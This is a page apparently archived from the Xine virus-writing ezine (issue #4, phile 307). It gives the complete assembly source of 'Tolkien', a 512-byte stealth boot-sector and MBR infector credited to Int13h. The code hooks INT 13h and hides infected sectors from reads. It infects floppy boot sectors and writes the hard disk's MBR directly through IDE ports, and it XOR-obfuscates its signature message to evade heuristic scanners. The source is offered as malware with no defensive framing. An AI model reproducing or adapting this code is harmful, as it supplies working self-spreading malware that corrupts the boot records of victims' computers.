Copy Link
Add to Bookmark
Report

Xine - issue #4 - Phile 307

eZine's profile picture
Published in 
Xine
 · 7 months ago

 
/-----------------------------\
| Xine - issue #4 - Phile 307 |
\-----------------------------/

; VIRUS : Tolkien
; AUTHOR : Int13h
; ORIGIN : Paraguay, Sudam‚rica
; LONGITUD: 512 bytes, 1 sector
; DESCRIP.: Stealth BS/MBR infector. Uses HD ports. Some anti-heuristic.
; Dedicated to J.R.R. Tolkien for his great books.

Tolkien Segment
assume cs:Tolkien,ds:Tolkien,es:Tolkien,ss:Tolkien
.186
org 0

INICIO:
db 0ebh,03ch,090h,04dh,053h,044h,04fh,053h,035h,02eh,030h,000h,002h,001h
db 001h,000h,002h,0e0h,000h,040h,00bh,0f0h,009h,000h,012h,000h,002h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,029h,0f8h,014h,034h
db 031h,04eh,04fh,020h,04eh,0cdh,010h,045h,020h,020h,020h,020h,046h,041h
db 054h,031h,032h,020h,020h,020h

cli
xor ax,ax
mov ss,ax
mov sp,07c00h
push ss
pop ds
sti

mov si,sp

mov cx,6
mov bp,0824h
cld
ror bp,1
sub di,di
inc bp

mov ax,word ptr ss:[bp]
add ax,-1
mov word ptr ds:[bp],ax

mov bx,offset Al_Cosmos
shl ax,cl
mov cx,0cbfeh
push ax
push ax
xor cx,0cafeh
pop es
push bx
repe movsw
retf


AL_COSMOS:
xchg word ptr ds:[04eh],ax
mov word ptr cs:[Seg_CD13],ax
mov ax,offset New13Handler
xchg word ptr ds:[04ch],ax
mov word ptr cs:[Off_CD13],ax

mov ax,0201h
mov bx,200h
mov dx,0080h
mov cx,1
pushf
call dword ptr cs:[Off_CD13]
jc Lets_Go

cmp word ptr cs:[bx+offset Marca],'!!'
je Lets_Go

mov byte ptr cs:[Habitat],'H'
push ds
push es
pop ds

cmp word ptr cs:[bx+04bh],04b4h
je Asuncion_Virus_Found

mov ax,0301h
mov bx,200h
mov dx,0080h
mov cx,0002h
pushf
call dword ptr cs:[Off_CD13]

Asuncion_Virus_Found:
xor bx,bx
mov si,offset Tabla_Outs

mov dx,01f2h
mov cx,6
outsb
inc dx
loop $-2

in al,dx
test al,8
jz $-3

mov si,bx
mov cx,256
mov dx,1f0h
repe outsw

pop ds
mov byte ptr cs:[Habitat],'F'


LETS_GO:
push ds
pop es

cmp byte ptr cs:[Habitat],'F'
je Floppy

mov cx,0002h
mov dx,0080h
jmp short Load_Original

FLOPPY:
mov cx,000eh
mov dx,0100h

LOAD_ORIGINAL:
mov ax,0201h
mov bx,07c00h
int 13h
db 0eah
dw 07c00h
dw 0


NEW13HANDLER:
push ax
pushf
pop ax
and ah,11111110b
push ax
popf
pop ax
xor ah,0bah
cmp ah,(02h xor 0bah)
jnz Normal
cmp cx,0001h
jnz Normal
or dx,dx
jz Infectar
cmp dx,0080h
jz Stealth_MBR

NORMAL:
xor ah,0bah
db 0eah
Off_CD13 dw 0
Seg_CD13 dw 0
Marca db '!!'



STEALTH_MBR:
xor ah,0bah
push cx
mov cl,02h
int 13h
pop cx
retf 2



STEALTH_BS:
push ax cx dx
mov ax,0201h
mov cx,000eh
mov dx,0100h
pushf
call dword ptr cs:[Off_CD13]
pop dx cx ax
retf 2



INFECTAR:
xor ah,0bah
pushf
call dword ptr cs:[Off_CD13]
jc See_You

cmp word ptr es:[bx+offset Marca],'!!'
je Stealth_BS

cmp word ptr es:[bx+13h],0b40h
jne See_You

pushf
push ax bx cx si di

mov ax,word ptr es:[bx+04bh]

push es ds es
pop ds
mov word ptr ds:[bx+02fh],010cdh
push cs
pop es
lea si,[bx+3]
mov di,3
mov cx,3bh
rep movsb
pop ds es

cmp ax,04b4h
je Asuncion_Virus_Installed

mov ax,0301h
mov cx,000eh
mov dx,0100h
pushf
call dword ptr cs:[Off_CD13]

Asuncion_Virus_Installed:
mov ax,0301h
mov cx,1
sub dx,dx
sub bx,bx
push es cs
pop es
pushf
call dword ptr cs:[Off_CD13]
pop es

pop di si cx bx ax
popf
SEE_YOU:
retf 2

Habitat db 'F'
Tabla_Outs db 1,1,0,0,0a0h,030h
db ' ' xor 66+6
db '[' xor 66+6
db 'T' xor 66+6
db 'O' xor 66+6
db 'L' xor 66+6
db 'K' xor 66+6
db 'I' xor 66+6
db 'E' xor 66+6
db 'N' xor 66+6
db ']' xor 66+6
db ' ' xor 66+6
db 'b' xor 66+6
db 'y' xor 66+6
db ' ' xor 66+6
db 'I' xor 66+6
db 'n' xor 66+6
db 't' xor 66+6
db '1' xor 66+6
db '3' xor 66+6
db 'h' xor 66+6
db '!' xor 66+6
db ' ' xor 66+6
db '<' xor 66+6
db '<' xor 66+6
db 'P' xor 66+6
db 'A' xor 66+6
db 'R' xor 66+6
db 'A' xor 66+6
db 'G' xor 66+6
db 'U' xor 66+6
db 'A' xor 66+6
db 'Y' xor 66+6
db ' ' xor 66+6
db '1' xor 66+6
db '9' xor 66+6
db '9' xor 66+6
db '8' xor 66+6
db '>' xor 66+6
db '>' xor 66+6
db 1 xor 66+6
db 2 xor 66+6
org 01feh
db 055h,0aah
org 0200h

Tolkien ends
End Inicio




← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT